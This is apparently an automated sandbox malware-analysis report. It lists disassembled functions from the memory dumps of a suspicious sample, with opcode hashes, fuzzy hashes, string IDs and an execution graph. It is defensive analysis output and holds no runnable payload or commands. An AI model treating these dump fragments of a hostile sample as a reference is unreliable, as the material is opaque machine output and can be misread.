                                                                                                        • Instruction ID: 35730da78ee2a449bd23f37afe72bd14005a4380ca86368573095c99331596ea
                                                                                                        • Opcode Fuzzy Hash: 84115bb65ca9425006b15828c57463acc0a7e1d8336d350bf6cdbe94dddc1bd1
                                                                                                        • Instruction Fuzzy Hash: 66014F322046608FC705DB2CD959A857BF1AF46709B1945E9D04ACF772DB61EC84CB40
                                                                                                        Function 0522E03F Relevance: .0, Instructions: 37COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f1bcae5e832d5b374b51db51d1a95ffbc255c1d1e05b4978076e7fc8a92e7792
                                                                                                        • Instruction ID: d70e2d46c3f8ae8f65f7be11b2a267d201ae8d2c90c9986f2eea1b017904c336
                                                                                                        • Opcode Fuzzy Hash: f1bcae5e832d5b374b51db51d1a95ffbc255c1d1e05b4978076e7fc8a92e7792
                                                                                                        • Instruction Fuzzy Hash: 41F0E9323506155FC6209F69DCD4A5FBBE9EFC42257000938E00ACF3A0CE61DC464790
                                                                                                        Function 0522E050 Relevance: .0, Instructions: 37COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: df9dfe25d1062a0aa428490a8e4aae7802f24c6de2eafa93225246f85faa2267
                                                                                                        • Instruction ID: d45b8e39b5e31f60df0159e5f14c357f10230aee2659cfabd1584c2f2375749b
                                                                                                        • Opcode Fuzzy Hash: df9dfe25d1062a0aa428490a8e4aae7802f24c6de2eafa93225246f85faa2267
                                                                                                        • Instruction Fuzzy Hash: ACF05E763106154F86259F6AE88485ABBEAEFD42253004A7AE10ECB260CE71ED4A8790
                                                                                                        Function 0522AE80 Relevance: .0, Instructions: 37COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 585f588635d4ec2111f965ff813853df1704e5792c588293ac43cd994bc86894
                                                                                                        • Instruction ID: 2ca529c88ebcba653353d0423b0520c44a4aa9791f21fdc9ba0aed4724aa53e8
                                                                                                        • Opcode Fuzzy Hash: 585f588635d4ec2111f965ff813853df1704e5792c588293ac43cd994bc86894
                                                                                                        • Instruction Fuzzy Hash: 12F0F6751097906FC7364B249910AA37FF8EF4661030589AFD8C9C7A56D234E845C761
                                                                                                        Function 0522DC48 Relevance: .0, Instructions: 37COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 98901a4e9cba5f51eccd4ad81d3443ccd3842428af68c94071a0af37fdb537e1
                                                                                                        • Instruction ID: b63317558592f9f94dec6f941cf0a014a815a2a59e950b462d11cae6c707a124
                                                                                                        • Opcode Fuzzy Hash: 98901a4e9cba5f51eccd4ad81d3443ccd3842428af68c94071a0af37fdb537e1
                                                                                                        • Instruction Fuzzy Hash: A3F0C23AB20B14ABCB157A78C4044AEB776EFC1610F01466ED84967200EF30A982CAD2
                                                                                                        Function 0522BEE0 Relevance: .0, Instructions: 37COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ab825bf9bc5436cbbfde64ca6eeedb297e26e96c31fd27eb610ce5f4f4fabe78
                                                                                                        • Instruction ID: b5168dec0ba541c4321465c4c73671b4d2f4e9fe933105ad91a9919de6338e90
                                                                                                        • Opcode Fuzzy Hash: ab825bf9bc5436cbbfde64ca6eeedb297e26e96c31fd27eb610ce5f4f4fabe78
                                                                                                        • Instruction Fuzzy Hash: 69F0E93D33D2729BD7248A299854B7D37A6AFC0912B09406EF407CB692DB64D802CB90
                                                                                                        Function 0522BE58 Relevance: .0, Instructions: 36COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0a301f27bc581df4d4746c37a269122f7963f8b8c9aff5c29a1a20171dfff14f
                                                                                                        • Instruction ID: 922fb1cdab3d5155b8ee109789ddeb7bf2c41e026a01e9437953882f71dd9854
                                                                                                        • Opcode Fuzzy Hash: 0a301f27bc581df4d4746c37a269122f7963f8b8c9aff5c29a1a20171dfff14f
                                                                                                        • Instruction Fuzzy Hash: 62F08239324930A7CB196639902863D73DBAFD6A11B54402DE50ACF7A1CF64CC42C795
                                                                                                        Function 0522B218 Relevance: .0, Instructions: 35COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3ce29a3665e5256b629ec490de319377e7f371b5ee6bee049808c67e34ab26c3
                                                                                                        • Instruction ID: 205fa1043576f4a38075a9738b05b0856edeb73b92a54b6c37004487831d0a0a
                                                                                                        • Opcode Fuzzy Hash: 3ce29a3665e5256b629ec490de319377e7f371b5ee6bee049808c67e34ab26c3
                                                                                                        • Instruction Fuzzy Hash: 8901C475A00609DFCB40EFB8C5859EEBFF0FF49204B11869BE459E7221E7709A58CB81
                                                                                                        Function 0522DCC8 Relevance: .0, Instructions: 34COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6710daa5590dea0083ca2215d4247c3a3ab073ca820f0c3f659c37b26657da4d
                                                                                                        • Instruction ID: 0a5c925b2b72bb32716291b07504c5c9db25dc1332527444c1c6e32ea37eadd3
                                                                                                        • Opcode Fuzzy Hash: 6710daa5590dea0083ca2215d4247c3a3ab073ca820f0c3f659c37b26657da4d
                                                                                                        • Instruction Fuzzy Hash: 8BF090322106158FC724AB1EE58496AF7BAFFC8725B400269E40A87360DB31AC428B90
                                                                                                        Function 0522B228 Relevance: .0, Instructions: 33COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e26b3b693c3fa3a092213b46d9974f97095fdf38ae2968b16eb170a88f8efb51
                                                                                                        • Instruction ID: 4243ceffdd30f352615e2fe6667d750750fc4abca0ae9b7f9b7c733986b7bd1f
                                                                                                        • Opcode Fuzzy Hash: e26b3b693c3fa3a092213b46d9974f97095fdf38ae2968b16eb170a88f8efb51
                                                                                                        • Instruction Fuzzy Hash: 0601B675D00609DFCB40EFACC54589DBBF4FF49210B1185AAE859EB321E770AA44CF91
                                                                                                        Function 0522E4C0 Relevance: .0, Instructions: 28COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b033710d89f1f651d96db2930723ee0556e6e96e28737a5f38f0d8bdb62b2454
                                                                                                        • Instruction ID: 8cef1289cb47f2b94fb9cb552038885681011f1e861161c683f646b3e88be426
                                                                                                        • Opcode Fuzzy Hash: b033710d89f1f651d96db2930723ee0556e6e96e28737a5f38f0d8bdb62b2454
                                                                                                        • Instruction Fuzzy Hash: 3CF0BC342506208FC718DB2CD588C59BBEAEF4AB1971245A9E10ACB372CB72EC40CB90
                                                                                                        Function 0522A338 Relevance: .0, Instructions: 27COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 920e25aad329eb071fbb80597bb703f455efa37a405840afe270c6c865142e12
                                                                                                        • Instruction ID: df432ac33a50c4962c668ad91e581a4a606c46af5a6b14051d8b2d48061278db
                                                                                                        • Opcode Fuzzy Hash: 920e25aad329eb071fbb80597bb703f455efa37a405840afe270c6c865142e12
                                                                                                        • Instruction Fuzzy Hash: DDE04F76B181287B5B48DAA99C409AFBAEFDF84150F108079A508D3254FE319D818790
                                                                                                        Function 05228CEC Relevance: .0, Instructions: 24COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: fabd863925daa6b1f0838c5dfc67143169369e7019d8d23234890686fad5bfa9
                                                                                                        • Instruction ID: 8583b8400db9f102d7389a3b997e4ce64ef6c2d72b249224a9ca4d83cfe848d8
                                                                                                        • Opcode Fuzzy Hash: fabd863925daa6b1f0838c5dfc67143169369e7019d8d23234890686fad5bfa9
                                                                                                        • Instruction Fuzzy Hash: BFE0D8321041697FCB029F59D940AEB7FDDDF49310F008551FA0886126C376D56297E5
                                                                                                        Function 05222FE4 Relevance: .0, Instructions: 23COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f4122b46639a12b85ce6831d948844422d69c025f28ca90724ef30fb8f08d887
                                                                                                        • Instruction ID: c65e1b3b107aa7d625bf6d441fc48ae9d6a220954c8f81eea7e95cfbfc7564e7
                                                                                                        • Opcode Fuzzy Hash: f4122b46639a12b85ce6831d948844422d69c025f28ca90724ef30fb8f08d887
                                                                                                        • Instruction Fuzzy Hash: 97E0C234364614AFC728EB5CE88086AF3FAEF8C3103558A79F10AC7365CEA0FC044688
                                                                                                        Function 0522AE31 Relevance: .0, Instructions: 23COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a3d975e591faecbaf5a0ac346f17761a8f776a62b7c3b2b071e9f48cdeb62aa3
                                                                                                        • Instruction ID: 79655d447019220fc098ab3f31114b1805435c4d20bccbb00c64495017677911
                                                                                                        • Opcode Fuzzy Hash: a3d975e591faecbaf5a0ac346f17761a8f776a62b7c3b2b071e9f48cdeb62aa3
                                                                                                        • Instruction Fuzzy Hash: BCF0ED320082D86FCB038F58D900ADA7FA49F09204B088996F6988A127C236CA6697A1
                                                                                                        Function 0522BE10 Relevance: .0, Instructions: 22COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b7ee91176554eae861b1290dc9103d650589c4c4b7c715b6f96ba5d11e458b19
                                                                                                        • Instruction ID: 419fc5c007efb648a093280ffb0900de29f14dcfc815cf2940668018d3c29bda
                                                                                                        • Opcode Fuzzy Hash: b7ee91176554eae861b1290dc9103d650589c4c4b7c715b6f96ba5d11e458b19
                                                                                                        • Instruction Fuzzy Hash: 35E086353146508FC718CB6CD490B967BF2EF89310B1985AEE089C73A1DA60DC058740
                                                                                                        Function 0522DD20 Relevance: .0, Instructions: 21COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8f3215926200a49d6c55713b5643edb493c58d43fc681ad64bea70192efefb85
                                                                                                        • Instruction ID: 2ddf4f59696dfeb45c7c1c9a3cba08e87fd4932c4ada546397cde401e1df71d5
                                                                                                        • Opcode Fuzzy Hash: 8f3215926200a49d6c55713b5643edb493c58d43fc681ad64bea70192efefb85
                                                                                                        • Instruction Fuzzy Hash: E1D0C92A71043117C264E55CBCA57AB66DADBCA775B58046EF505DB384EC528D0103D5
                                                                                                        Function 0522B641 Relevance: .0, Instructions: 19COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e933fd5a5debdc54246425fc2da85fe46befbd14f8daf6873a5cae7d59bdb5d1
                                                                                                        • Instruction ID: 5d93c0da2e9b487e7d87b587c70a0a2674b4a4e04410e8830670d456b7d23e34
                                                                                                        • Opcode Fuzzy Hash: e933fd5a5debdc54246425fc2da85fe46befbd14f8daf6873a5cae7d59bdb5d1
                                                                                                        • Instruction Fuzzy Hash: 5CE0863821829147D7069B71989A3753FA5FF41215B4945AEE484CA483DB198089D711
                                                                                                        Function 0522EF20 Relevance: .0, Instructions: 16COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 314c2210e205272fd055976ce1d6a3a5c8b792a357010cc7f5a081bd04a0eb63
                                                                                                        • Instruction ID: 612a74c4be6744e63f4fceaae239153d0ffee1e213a2b9256265e0a6a5a1a59a
                                                                                                        • Opcode Fuzzy Hash: 314c2210e205272fd055976ce1d6a3a5c8b792a357010cc7f5a081bd04a0eb63
                                                                                                        • Instruction Fuzzy Hash: F1D0223437A30B83EB1857A4B488A35339EBF00305B0A0068F80EC9800EB22E840B112
                                                                                                        Function 0522EF10 Relevance: .0, Instructions: 16COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 60937f3b2ac9e2931df25f944692a96368c4d242f018e586fe423aed9718db24
                                                                                                        • Instruction ID: 44ec66345bb7f56f5fb7eb37bad57fcf22d784ce9a5ab41298dfcae50f5a83b7
                                                                                                        • Opcode Fuzzy Hash: 60937f3b2ac9e2931df25f944692a96368c4d242f018e586fe423aed9718db24
                                                                                                        • Instruction Fuzzy Hash: C2D0A7680BA1E155E34142755E9A7B13F65EB013D4F0900AAD8C544043D51580017312
                                                                                                        Function 0522B650 Relevance: .0, Instructions: 16COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5bd8b39a87cf125bd4896cd7338a6f0936b3fbd5207849ad0d25a479a1384e70
                                                                                                        • Instruction ID: 57de1a5fe3eb5da2f547d3e4e6b65a3233b5c0c11a0a55eca56d7919bc92121f
                                                                                                        • Opcode Fuzzy Hash: 5bd8b39a87cf125bd4896cd7338a6f0936b3fbd5207849ad0d25a479a1384e70
                                                                                                        • Instruction Fuzzy Hash: F9D0A73431421547A7046FB6685A235378FBB846053858014A24A861C4CE28D9819651

                                                                                                        Non-executed Functions

                                                                                                        Function 05224748 Relevance: 41.7, Strings: 33, Instructions: 438COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                                                                        • API String ID: 0-2697097662
                                                                                                        • Opcode ID: e90dcbecc8d71606a853bf997aa8cb9336e4e90226b0d98da366e3ab561057f8
                                                                                                        • Instruction ID: 2104c21e23182d286c17a07e6973180119ebe9fbe2d854526e168ff81c761f66
                                                                                                        • Opcode Fuzzy Hash: e90dcbecc8d71606a853bf997aa8cb9336e4e90226b0d98da366e3ab561057f8
                                                                                                        • Instruction Fuzzy Hash: 211221B0E5121A8FCB19EF75E89169DB7B2FF80300F5045A9D049AB26CDF306989CF91
                                                                                                        Function 05224758 Relevance: 41.7, Strings: 33, Instructions: 434COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1784942242.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_5220000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                                                                        • API String ID: 0-2697097662
                                                                                                        • Opcode ID: 2ac822d1e5eefbb4d6f17c7f1df6448d1e090fc579cc99b5d0f96c42af4975eb
                                                                                                        • Instruction ID: ea30e483ea74b2dfb60960672d2371cda66752bf0239f0a59d257bd59c336310
                                                                                                        • Opcode Fuzzy Hash: 2ac822d1e5eefbb4d6f17c7f1df6448d1e090fc579cc99b5d0f96c42af4975eb
                                                                                                        • Instruction Fuzzy Hash: 8B1210B0E5121A8FCB19EF75E89169DB7B6FF80300F5085A9D0496B26CDF306989CF91

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:19.3%
                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:47
                                                                                                        Total number of Limit Nodes:12
                                                                                                        execution_graph 19638 29ee018 19639 29ee024 19638->19639 19645 6962968 19639->19645 19641 29ee61f 19646 696298a 19645->19646 19647 29ee0c3 19646->19647 19660 696992c 19646->19660 19666 6969328 19646->19666 19673 6969318 19646->19673 19682 6969548 19646->19682 19652 696fc68 19647->19652 19656 696fc5e 19647->19656 19653 696fc8a 19652->19653 19654 6969548 4 API calls 19653->19654 19655 696fd3a 19653->19655 19654->19655 19655->19641 19657 696fc8a 19656->19657 19658 6969548 4 API calls 19657->19658 19659 696fd3a 19657->19659 19658->19659 19659->19641 19664 69697e3 19660->19664 19661 6969924 LdrInitializeThunk 19663 6969a81 19661->19663 19663->19647 19664->19661 19665 6969328 2 API calls 19664->19665 19665->19664 19667 696933a 19666->19667 19669 696933f 19666->19669 19667->19647 19668 696957e LdrInitializeThunk 19672 6969619 19668->19672 19669->19667 19669->19668 19670 69696d9 19670->19647 19671 6969a69 LdrInitializeThunk 19671->19670 19672->19670 19672->19671 19674 696933a 19673->19674 19676 696933f 19673->19676 19674->19647 19675 696957e LdrInitializeThunk 19680 6969619 19675->19680 19676->19674 19676->19675 19677 69696d9 19677->19647 19678 6969924 LdrInitializeThunk 19678->19677 19680->19677 19680->19678 19681 6969328 2 API calls 19680->19681 19681->19680 19683 696957e LdrInitializeThunk 19682->19683 19684 6969579 19682->19684 19689 6969619 19683->19689 19684->19683 19685 69696d9 19685->19647 19686 6969924 LdrInitializeThunk 19686->19685 19688 6969328 2 API calls 19688->19689 19689->19685 19689->19686 19689->19688 19690 6969c18 19691 6969c1f 19690->19691 19693 6969c25 19690->19693 19692 6969328 2 API calls 19691->19692 19691->19693 19695 6969fa6 19691->19695 19692->19695 19694 6969328 2 API calls 19694->19695 19695->19693 19695->19694

                                                                                                        Executed Functions

                                                                                                        Function 029EC468 Relevance: 9.0, Strings: 7, Instructions: 229COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 146 29ec468-29ec471 147 29ec415 146->147 148 29ec473-29ec498 146->148 151 29ec417-29ec45e 147->151 152 29ec3a2-29ec3d4 147->152 149 29ec49f-29ec57c call 29e41a0 call 29e3cc0 148->149 150 29ec49a 148->150 182 29ec57e 149->182 183 29ec583-29ec5a4 call 29e5658 149->183 150->149 160 29ec359-29ec36f 152->160 161 29ec3d6-29ec3fb 152->161 167 29ec399 160->167 168 29ec371-29ec37d 160->168 172 29ec3fd-29ec412 161->172 173 29ec413-29ec414 161->173 174 29ec39f 167->174 170 29ec37f-29ec385 168->170 171 29ec387-29ec38d 168->171 176 29ec397 170->176 171->176 172->173 173->147 174->152 176->174 182->183 185 29ec5a9-29ec5b4 183->185 186 29ec5bb-29ec5bf 185->186 187 29ec5b6 185->187 188 29ec5c4-29ec5cb 186->188 189 29ec5c1-29ec5c2 186->189 187->186 191 29ec5cd 188->191 192 29ec5d2-29ec5e0 188->192 190 29ec5e3-29ec627 189->190 196 29ec68d-29ec6a4 190->196 191->192 192->190 198 29ec629-29ec63f 196->198 199 29ec6a6-29ec6cb 196->199 203 29ec669 198->203 204 29ec641-29ec64d 198->204 206 29ec6cd-29ec6e2 199->206 207 29ec6e3 199->207 205 29ec66f-29ec68c 203->205 208 29ec64f-29ec655 204->208 209 29ec657-29ec65d 204->209 205->196 206->207 210 29ec667 208->210 209->210 210->205
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.4131544388.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_11_2_29e0000_HJnkiZjAPsec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q$PH^q$PH^q
                                                                                                        • API String ID: 0-1018772655
                                                                                                        • Opcode ID: d2331ae88f50dd2519dfef646a2aeb18986feb5fbc4f1b87c629bb1eece2c71b
                                                                                                        • Instruction ID: 082317ef93f2a8a40158755c7012444fbdceadf91f0d94c37513cc03724a7b11
                                                                                                        • Opcode Fuzzy Hash: d2331ae88f50dd2519dfef646a2aeb18986feb5fbc4f1b87c629bb1eece2c71b
                                                                                                        • Instruction Fuzzy Hash: 23A1D574E00219CFDF19DFA9D944AADBBF2BF88304F10906AE45AAB365DB309941CF50
                                                                                                        Function 029E6FC8 Relevance: 6.7, Strings: 5, Instructions: 462COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
